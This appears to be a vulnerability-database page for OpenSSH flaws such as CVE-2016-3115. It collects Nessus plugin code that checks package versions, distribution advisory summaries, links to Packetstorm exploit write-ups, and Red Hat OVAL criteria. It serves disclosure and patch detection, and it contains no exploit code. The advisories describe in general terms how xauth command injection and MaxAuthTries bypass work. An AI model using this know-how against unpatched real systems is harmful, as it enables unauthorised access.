value:"p-cpe:/a:novell:opensuse:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/01"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release =~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586\|i686\|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.1", reference:"openssh-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-debugsource-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-fips-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-debuginfo-6.6p1-11.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc"); }

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2016-0466.NASL
description	Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90079
published	2016-03-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90079
title	RHEL 6 : openssh (RHSA-2016:0466)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(90079); script_version("2.10"); script_cvs_date("Date: 2019/10/24 15:35:41"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"RHEL 6 : openssh (RHSA-2016:0466)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2016:0466" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2015-5600" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3115" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.7"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2016:0466"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", reference:"openssh-debuginfo-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc"); } }

NASL family	Gentoo Local Security Checks
NASL id	GENTOO_GLSA-201612-18.NASL
description	The remote host is affected by the vulnerability described in GLSA-201612-18 (OpenSSH: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. Impact : Remote attackers could cause Denial of Service and conduct user enumeration. Workaround : There is no known workaround at this time.
last seen	2020-06-01
modified	2020-06-02
plugin id	95604
published	2016-12-07
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/95604
title	GLSA-201612-18 : OpenSSH: Multiple vulnerabilities
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 201612-18. # # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(95604); script_version("3.4"); script_cvs_date("Date: 2019/04/11 17:23:06"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"); script_xref(name:"GLSA", value:"201612-18"); script_name(english:"GLSA-201612-18 : OpenSSH: Multiple vulnerabilities"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-201612-18 (OpenSSH: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. Impact : Remote attackers could cause Denial of Service and conduct user enumeration. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/201612-18" ); script_set_attribute( attribute:"solution", value: "All OpenSSH users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=net-misc/openssh-7.3_p1-r7'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2016/12/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/07"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"net-misc/openssh", unaffected:make_list("ge 7.3_p1-r7"), vulnerable:make_list("lt 7.3_p1-r7"))) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get()); else security_hole(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenSSH"); }

NASL family	OracleVM Local Security Checks
NASL id	ORACLEVM_OVMSA-2016-0070.NASL
description	The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024] - CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]
last seen	2020-06-01
modified	2020-06-02
plugin id	91750
published	2016-06-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91750
title	OracleVM 3.2 : openssh (OVMSA-2016-0070)

NASL family	Ubuntu Local Security Checks
NASL id	UBUNTU_USN-2966-1.NASL
description	Shayan Sadigh discovered that OpenSSH incorrectly handled environment files when the UseLogin feature is enabled. A local attacker could use this issue to gain privileges. (CVE-2015-8325) Ben Hawkes discovered that OpenSSH incorrectly handled certain network traffic. A remote attacker could possibly use this issue to cause OpenSSH to crash, resulting in a denial of service. This issue only applied to Ubuntu 15.10. (CVE-2016-1907) Thomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 forwarding when the SECURITY extension is disabled. A connection configured as being untrusted could get switched to trusted in certain scenarios, contrary to expectations. (CVE-2016-1908) It was discovered that OpenSSH incorrectly handled certain X11 forwarding data. A remote authenticated attacker could possibly use this issue to bypass certain intended command restrictions. (CVE-2016-3115). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	91086
published	2016-05-12
reporter	Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91086
title	Ubuntu 12.04 LTS / 14.04 LTS / 15.10 : openssh vulnerabilities (USN-2966-1)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-188267B485.NASL
description	Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-04-27
plugin id	90726
published	2016-04-27
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90726
title	Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)

NASL family	Misc.
NASL id	OPENSSH_72P2.NASL
description	According to its banner, the version of OpenSSH running on the remote host is prior to 7.2p2. It is, therefore, affected by a security bypass vulnerability due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this, via crafted credentials, to inject arbitrary xauth commands, resulting in gaining read and write access to arbitrary files, connecting to local ports, or performing further attacks on xauth itself. Note that exploiting this vulnerability requires X11Forwarding to have been enabled.
last seen	2020-06-01
modified	2020-06-02
plugin id	90023
published	2016-03-18
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90023
title	OpenSSH < 7.2p2 X11Forwarding xauth Command Injection

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20160321_OPENSSH_ON_SL7_X.NASL
description	It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen	2020-03-18
modified	2016-03-22
plugin id	90081
published	2016-03-22
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90081
title	Scientific Linux Security Update : openssh on SL7.x x86_64 (20160321)

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20160321_OPENSSH_ON_SL6_X.NASL
description	It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen	2020-03-18
modified	2016-03-22
plugin id	90080
published	2016-03-22
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90080
title	Scientific Linux Security Update : openssh on SL6.x i386/x86_64 (20160321)

NASL family	FreeBSD Local Security Checks
NASL id	FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL
description	The OpenSSH project reports : Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1). Injection of xauth commands grants the ability to read arbitrary files under the authenticated user
last seen	2020-06-01
modified	2020-06-02
plugin id	89897
published	2016-03-14
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/89897
title	FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)

NASL family	OracleVM Local Security Checks
NASL id	ORACLEVM_OVMSA-2016-0038.NASL
description	The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (#1245969) - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317816) - SSH2_MSG_DISCONNECT for user initiated disconnect follow RFC 4253 (#1222500) - Add missing dot in ssh manual page (#1197763) - Fix minor problems found by covscan/gcc (#1196063) - Add missing options in man ssh (#1197763) - Add KbdInteractiveAuthentication documentation to man sshd_config (#1109251) - Correct freeing newkeys structure when privileged monitor exits (#1208584) - Fix problems with failing persistent connections (#1131585) - Fix memory leaks in auditing patch (#1208584) - Better approach to logging sftp commands in chroot - Make sshd -T write all config options and add missing Cipher, MAC to man (#1109251) - Add missing ControlPersist option to man ssh (#1197763) - Add sftp option to force mode of created files (#1191055) - Do not load RSA1 keys in FIPS mode (#1197072) - Add missing support for ECDSA in ssh-keyscan (#1196331) - Fix coverity/gcc issues (#1196063) - Backport wildcard functionality for PermitOpen in sshd_config file (#1159055) - Ability to specify an arbitrary LDAP filter in ldap.conf (#1119506) - Fix ControlPersist option with ProxyCommand (#1160487) - Backport fix of ssh-keygen with error : gethostname: File name too long (#1161454) - Backport show remote address instead of UNKNOWN after timeout at password prompt (#1161449) - Fix printing of extensions in v01 certificates (#1093869) - Fix confusing audit trail for unsuccessful logins (#1127312) - Don
last seen	2020-06-01
modified	2020-06-02
plugin id	90076
published	2016-03-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90076
title	OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0038)

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2016-3531.NASL
description	Description of changes: [4.3p2-82.0.2] - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024] - CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]
last seen	2020-06-01
modified	2020-06-02
plugin id	90342
published	2016-04-05
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90342
title	Oracle Linux 5 : openssh (ELSA-2016-3531)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-0BCAB055A7.NASL
description	This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-03-28
plugin id	90209
published	2016-03-28
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90209
title	Fedora 24 : openssh-7.2p2-1.fc24 (2016-0bcab055a7)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-BB59DB3C86.NASL
description	This update provides recent upstream (security) release, sanitizing X11 authentication credentials. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-03-14
plugin id	89887
published	2016-03-14
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/89887
title	Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2016-2388-1.NASL
description	This update for OpenSSH fixes the following issues : - Prevent user enumeration through the timing of password processing. (bsc#989363, CVE-2016-6210) - Allow lowering the DH groups parameter limit in server as well as when GSSAPI key exchange is used. (bsc#948902) - Sanitize input for xauth(1). (bsc#970632, CVE-2016-3115) - Prevent X11 SECURITY circumvention when forwarding X11 connections. (bsc#962313, CVE-2016-1908) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option. (bsc#932483, bsc#948902) - Ignore PAM environment when using login. (bsc#975865, CVE-2015-8325) - Limit the accepted password length (prevents a possible denial of service). (bsc#992533, CVE-2016-6515) - Relax version requires for the openssh-askpass sub-package. (bsc#962794) - Avoid complaining about unset DISPLAY variable. (bsc#981654) - Initialize message id to prevent connection breakups in some cases. (bsc#959096) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	93735
published	2016-09-27
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/93735
title	SUSE SLES11 Security Update : openssh (SUSE-SU-2016:2388-1)

NASL family	CentOS Local Security Checks
NASL id	CENTOS_RHSA-2016-0465.NASL
description	Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90068
published	2016-03-22
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90068
title	CentOS 7 : openssh (CESA-2016:0465)

NASL family	AIX Local Security Checks
NASL id	AIX_OPENSSH_ADVISORY8.NASL
description	The remote AIX host has a version of OpenSSH installed that is affected by the following vulnerabilities : - A remote code execution vulnerability exists in the sshd server component of OpenSSH due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this vulnerability to inject arbitrary xauth commands. (CVE-2016-3115) - A security bypass vulnerability exists in the sshd server component of OpenSSH due to improper error handling. An authenticated, remote attacker can exploit this vulnerability, when an authentication cookie is generated during untrusted X11 forwarding, to gain access to the X server on the host system. (CVE-2016-1908)
last seen	2020-06-01
modified	2020-06-02
plugin id	90942
published	2016-05-06
reporter	This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/90942
title	AIX OpenSSH Advisory : openssh_advisory8.asc

NASL family	Slackware Local Security Checks
NASL id	SLACKWARE_SSA_2016-070-01.NASL
description	New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	89836
published	2016-03-11
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/89836
title	Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)

Packetstorm

data source	https://packetstormsecurity.com/files/download/136234/opensshfalse-bypass.txt
id	PACKETSTORM:136234
last seen	2016-12-05
published	2016-03-15
reporter	INTREST SEC
source	https://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html
title	OpenSSH 7.2p1 xauth Command Injection / Bypass

data source	https://packetstormsecurity.com/files/download/140019/logstorm.py.txt
id	PACKETSTORM:140019
last seen	2016-12-05
published	2016-12-05
reporter	Jeremy Brown
source	https://packetstormsecurity.com/files/140019/BlackStratus-LOGStorm-4.5.1.35-4.5.1.96-Remote-Root.html
title	BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 Remote Root

Redhat

advisories

bugzilla

id	1316829
title	CVE-2016-3115 openssh: missing sanitisation of input for X11 forwarding

oval

comment Red Hat Enterprise Linux must be installed
oval oval:com.redhat.rhba:tst:20070304026

AND

comment Red Hat Enterprise Linux 7 is installed
oval oval:com.redhat.rhba:tst:20150364027

AND

comment pam_ssh_agent_auth is earlier than 0:0.9.3-9.25.el7_2
oval oval:com.redhat.rhsa:tst:20160465001
comment pam_ssh_agent_auth is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884012

AND

comment openssh-server-sysvinit is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465003
comment openssh-server-sysvinit is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20150425002

AND
comment openssh-ldap is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465005
comment openssh-ldap is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884010

AND

comment openssh-keycat is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465007
comment openssh-keycat is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20150425016

AND

comment openssh-server is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465009
comment openssh-server is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884006

AND

comment openssh-askpass is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465011
comment openssh-askpass is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20120884008

AND
comment openssh is earlier than 0:6.6.1p1-25.el7_2
oval oval:com.redhat.rhsa:tst:20160465013
comment openssh is signed with Red Hat redhatrelease2 key
